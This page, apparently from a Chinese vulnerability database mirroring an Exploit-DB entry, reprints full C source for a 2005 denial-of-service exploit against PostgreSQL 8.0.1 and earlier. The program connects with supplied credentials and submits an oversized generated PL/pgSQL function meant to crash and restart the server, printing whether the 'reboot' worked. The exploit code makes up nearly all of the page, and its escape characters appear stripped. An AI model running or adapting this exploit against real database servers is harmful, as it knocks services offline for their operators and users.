PostgreSQL 8.01 – Remote Reboot (Denial of Service)

PostgreSQL 8.01 – Remote Reboot (Denial of Service)

漏洞ID 1055018 漏洞类型
发布时间 2005-04-19 更新时间 2005-04-19
图片[1]-PostgreSQL 8.01 – Remote Reboot (Denial of Service)-安全小百科CVE编号 N/A
图片[2]-PostgreSQL 8.01 – Remote Reboot (Denial of Service)-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/946
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* PostgreSQL Remote Reboot <=8.01 
 * writen by ChoiX [[email protected]]
 * (c) Unl0ck Research Team [www.unl0ck.org]
 *	info: Server can be rebooted only if plpgsql language is switched on.
 *		To compilate exploit you should have "libpq" library on your box 
 *		and use command $ cc -o pgsql_reboot pgsql_reboot.c -I/usr/local/pgsql/include  -L/usr/local/pgsql/lib -lpq
 *		Root exploits will be released later, coz now it's very dangerous to release it.
 *	greets to: 
 *			unl0ck members: DarkEagle, crash-x, nekd0, xtix, [0xdeadbabe]
 *			m00 members: ov3r 
 */
#include <stdio.h>
#include <getopt.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <libpq-fe.h>

#define DEFAULT_PORT "5321"
#define DEFAULT_DB "postgresql"
#define FUNC_NAME "uKt_test"
#define TABLE_NAME "unl0ck_table" 

char str[4000];
char create[]="CREATE OR REPLACE FUNCTION %s RETURNS integer AS $$n";
char declare[] = "DECLAREn";
char com[] = "t--%n";
char varible_REC[] = "trec RECORD;n";
char varible_var[] = "tvar%d varchar := 'BBBB';n";
char begin[] = "BEGINn";
char select_1[] = "SELECT INTO rec FROM %s WHEREn";
char select_2[] = "var%d = AAAA ANDn";
char select_3[] = "var1029 = AAAA;n";
char end[] = "ENDn";
char finish[] = "$$ LANGUAGE plpgsqln";


void usage(char *name){
printf("PostgreSQL Remote DoS <=8.0.1n");
printf("writen by ChoiX [[email protected]]n");
printf("(c) Unl0ck Research Team [[email protected]]n");
printf("Usage: %s -H <host_address> [-P <port>] -u <user_name> -p <password> [-d <database_name>] n", name);
printf("Default port = %snDefault dbname = %sn", DEFAULT_PORT, DEFAULT_DB);
exit(0);
}

int make_str();

int main(int argc, char *argv[]){
char opt;
char *host = NULL, *port = NULL, *user = NULL, *password = NULL, *dbname = NULL;
struct hostent *he;
PGconn *conn;
PGresult *res;

while((opt = getopt(argc, argv, "H:P:u:p:d:")) != EOF){
	switch(opt){
		case 'H':
			host = optarg;
			break;
		case 'P':
			port = optarg;
			break;
		case 'u':
			user = optarg;
			break;
		case 'p':
			password = optarg;
			break;
		case 'd':
			dbname = optarg;
			break;
		default:
			usage(argv[0]);
			break;
	}
}
if(host == NULL) usage(argv[0]);
if(user == NULL) usage(argv[0]);
if(password == NULL) usage(argv[0]);
if(port == NULL) port = DEFAULT_PORT; 
if(dbname == NULL) dbname = DEFAULT_DB;

printf("tPostgreSQL Remote DoS <=8.0.1n");
printf("[*] Host/Port: %s/%sn", host, port);
printf("[*] DBname/User/Password: %s/%s/%sn", dbname, user, password); 

conn = PQsetdbLogin(host, port, NULL, NULL, dbname, user, password);
if(PQstatus(conn) == CONNECTION_BAD){
	PQfinish(conn);
	printf("[-] Cannot connect to the databasen");
	exit(1);
}
printf("[+] Connected to the databasen");

make_str();
printf("[+] Command has been generatedn");
res = PQexec(conn, str);
if (PQresultStatus(res) == PGRES_TUPLES_OK){
	printf("[+] Command has been sentn");
}
if(PQstatus(conn) == CONNECTION_BAD){
	printf("[+] Server has been rebootedn");
	exit(0);
} else {
	printf("[-] Server hasnt been rebootedn");
	exit(0);
}
}

int make_str(){
char temp[100];
int i;
int len = sizeof(temp) -1;

//write char create[]
snprintf(temp, len, create, FUNC_NAME); 
strcpy(str,temp);
//write char declare[] 
snprintf(temp, len, begin);
strcat(str, temp);
//write char varible_REC[]
snprintf(temp, len, varible_REC);
strcat(str, temp);
//write char varible_var[]
for(i = 0;i < 1029;i++){
	snprintf(temp, len, varible_var, i);
	strcat(str, temp);
}
//write char begin[]
snprintf(temp, len, begin);
strcat(str, temp);
//write char select_1[]
snprintf(temp, len, select_1, TABLE_NAME);
strcat(str, temp);
//write char select_2[]
for(i = 0;i < 1028;i++){
	snprintf(temp, len, select_2, i);
	strcat(str, temp);
}
//write char select_3[]
snprintf(temp, len, select_3);
strcat(str, temp);
//write char end[]
snprintf(temp, len, temp);
strcat(str, temp);
//write char finish[]
snprintf(temp, len, finish);
strcat(str,temp);

return 0;
}



// milw0rm.com [2005-04-19]

相关推荐: orderdetails.aspx参数修改命令查看漏洞

orderdetails.aspx参数修改命令查看漏洞 漏洞ID 1204042 漏洞类型 未知 发布时间 2002-07-26 更新时间 2002-07-26 CVE编号 CVE-2002-0409 CNNVD-ID CNNVD-200207-106 漏洞平…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享